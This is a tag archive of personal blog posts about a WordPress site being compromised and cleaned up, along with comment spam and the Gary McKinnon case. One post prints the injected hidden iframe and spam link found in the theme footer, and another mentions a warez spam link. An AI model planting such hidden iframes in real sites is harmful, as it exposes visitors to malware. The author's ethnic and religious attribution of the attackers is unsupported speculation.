Tag Archive: Cracker

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Turkish Hacker-Crackers, perhaps?

A Cracking Week Off?

I had a week’s holiday of sorts last week.  On returning I found that this website had been cracked. (I already had intimations that something was wrong because of site stat failures and an email from @Justin Asking, sometime commenter to this website and others).  Anyway, so it was.  Unfortunately, I didn’t have good web access so was unable to correct things properly.

The main screen, viewable on zone-h here, was replaced by this,

Site Hack Aug 2011

Site Hack Aug 2011

A neat little JavaScript mouse trailer was part of the package!

The cause was my own – a wide-open directory made so as part of an image upload plugin for my WordPress installation.  This plugin makes it easy and neat for any commenter to add material to the website……unfortunately for me, it allowed any file, with active content or not, to be uploaded.

Needless to say, the plugin is now disabled and the directory is locked down to the specific  file types that I’ll accept.  No more active content allowed there matey!

Unwanted Extras

Once the nasty files were uploaded, the internal site privileges allowed the install of a swathe of .htm files to the site root and uploads folder.  These had various names like f.htm, g.htm etc.  Index.htm was the file on show.

Alongside these, apart from files needed to run the previously mentioned JavaScript, were another swathe of .phtml files, such as joker.phtml, which are actually php code shining as html.  A couple of plain text files had also been uploaded.  These had lists of files, sites and persons.

All .htaccess files were okay as well as the WordPress installation files.  To be sure, I redid the WordPress install from scratch with fresh downloaded files..

Finale

All told, about fifty files were dumped on my website.  I’ve hopefully removed the lot and have them downloaded for analysis at a later date.  The screen content and internal code all points to Turkish or S.E. Asian (Vietnam or Indonesia) Muslim crackers (I refuse to use the hacker term except to clarify the cracking of security by it’s now-common usage).  Saying this, the culprits (the code points to several authors who used freely downloadable files from cracking websites and then proudly expected a pat on the back for their extreme skill at doing a download…like….der….), the culprits could have come from anywhere.

Fifth columnists and agent-provocateurs are nothing new.

Interestingly, being cracked puts me in the same company as at least 186 well-known multinational businesses, such as Acer, Vodaphone, BetFair, The Daily Telegraph, The Register, Spam.Org, Victoria Beckham and Destiny’s Child.

Even System of a Down dot com, was down!

Zone-h’s full list is here.  The Register reports it here, The Guardian here.

The Guardian interview with the crackers notes that the culprits had been planning the attack for some time which obviously includes the time when my site was compromised.  I don’t know if my website was actually used as part of the above DNS server attack but it’s usual for an attack like a DDOS to use several vectors and simultaneous attack points in order to force a server to fail and dump code.  This dump then reveals passwords and the like for later use.

Addendum

WordPress.Org’s forum has a posting about this crack from last week.  A Google search in the comment by RedNeckTexan shows the attack on this website to be far from unique….!   The links I’ve followed go right to the heart of the crack and the people doing the cracking.

This is the Google Search on the “Easy Comment Uploader” plugin.  Like me, RedNeckTexan has pulled the plugin for now, which can be found in the WordPress repository here.

Related Posts:

Comments are closed

Weird Pings from a Sub-Domain

Strangely post on May 22nd, 2009
Posted in Technology Tags: , , , , , , , , , , , , , , , , , ,

I’ve Been Pinged from My Own Unknown Sub-Domains!

One day I’ll figure how this http protocol and the rest work….

Last night I had some hits looking for a feed and the domain root from

Now this doesn’t exist!  So I got pinged by myself from something that doesn’t exist!

In fact I haven’t any sub-domains on this domain and there are no /board/ folders….  So I thought I’d check the records.  After all, the records show that I’m referring to myself!!!

Well they say the referral was instigated by a person that’s already commented much good stuff to this website, @Not Kevin.  He was at his standard ISP address in bonny Scotland.

What’s it Mean?

Well I don’t know, actually!  It could be that Not Kevin was using a reader or plugin for Firefox that has certain default settings that it scans through.  He could actually be on the World’s Most Wanted List of Hackers and Crackers, but I doubt it!  All I know is that it’s weird.

What Else is Weird?

Well weird is weird.  It’s another word that breaks the “I before E except after C” rule.  More like a guideline really – like MP expenses and the Pirate Code.

Now that’s weird.

Related Posts:

Comments are closed

Rapidshare WordPress Comment Spam

I got an unusual (for me) comment spam this morning at 01:58 from a Kuala Lumpur spammer.  His modus operandi is to trawl WordPress blogs looking for the word “RapidShare” and then dump a deliberately malformed warez-type URL to a zip file promising unlimited super-fast Rapidshare accounts that have been compromised.

I had such a posting quite a while ago here, view-of-local-network-from-rapidshare-a-black-hole, so I’ll be letting the comment through because it’s got no active backlinks and such like.

RapidShare

It’s a file sharing website where users can share files of their own creation or where there isn’t a valid copyright. In the real world, of course, I guess about 99% of it is cracked software and copyright video and music. Some of it is my own and others under the Crawling Chaos moniker.  Bizarrely, you can actually pay a premium if you want better downloads of the ‘free’ stuff in the “premium” service.  But that’s the point, isn’t it?  ;-)

Comment Spammer

And this is where the spammer comes in. The comment and malformed URL is this;

Hey guy's! Check it out.HURRY!
JUST DONT CHANGE THE PASSWORD COZ EVERYBODY ALSO USING IT . Enjoyyyy.

h t t p://rapidshare.com/files/203145031/Rapidshare_Premium_Accounts_-_Latest_Issue.zip

Content

I checked the zip.  There’s a lot of Spanish and English in some text files as word docs in both old and new formats as well as plain text files.  There’s also an MP3 file.  In my sandbox they checked as clean!!  I haven’t gone any deeper into testing the passwords as Rapidshare, while being good in principle, is actually theft and deception in practice.

The spammer’s email checks out in a few on-line mobile phone sales on a Malaysian website. It’s [email protected] but it’s probably spoofed.  With so much secrecy and nefarious activity on the web, who’s to say?

I don’t see it as a benevolent gesture of a thief in a theft based culture.  I see it more as a tester for a bigger plan.  Maybe, send a few of these ‘tasters’ out for a bit before the true malevolence is delivered?  Maybe the dodgy content is in the particular RapidShare accounts that have been compromised or deliberately set up with this purpose in mind?

You’ve been warned!

Related Posts:

Free The UFO One!

Gary McKinnon, the UFO spotter cum computer hacker is still not tried for his ‘offence’.  But the ice he’s treading is getting thinner and thinner.

Recently our nice CPS deemed that there wasn’t enough UK evidence to try him – but that the USA had plenty so we’ll send him there!

WargamesHis charge, which I mentioned earlier here, Gold’en Rant : Why Did The UK Government Fail To Back Gary McKinnon?, and which I referred to this post, Gold’en Rant : Why Did The UK Government Fail To Back Gary McKinnon?, is that he cracked open lots of poorly defended USA military computers.  His defence is that he was only looking for hidden information on UFOs, which many in the USA believe to be true.

Funnily enough, even though there’s a potentially life-long sentence awaiting him and the USA has admitted recent torture and abduction of civilians (e.g. Guantanamo Bay etc), the UK has a one-way extradition treaty with the USA.  This means that nutter computer Yanks can’t be extradited here!  There are actually tens, if not hundreds of USA based spammers and trojan launchers who could fit that criteria … think of the damage and economic waste they’ve generated…   funny that, innit?

THe Bourne Identity etcPersonally, after watching him in the two videos below, he just seems a bright guy.  I’m not even certain about the Asperger’s thing – I’m exactly like him.  His real crime seems to be upsetting the GW Bush PATRIOT mob and making their billions of high tech look like kindergarten bricks.  GW Bush etc seem to have been trapped into believing that the power of IT in their hands, as depicted in films like “The Bourne Identity” etc, is true.  The reality, as we’ve all seen on our British streets, is that the intelligence services are as clueless as everyone else and will shoot a defenceless man on a tube train eight times in the head with dum-dum bullets in a blind panic.

Recent Links for Info:

Related Posts:

Comments are closed

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me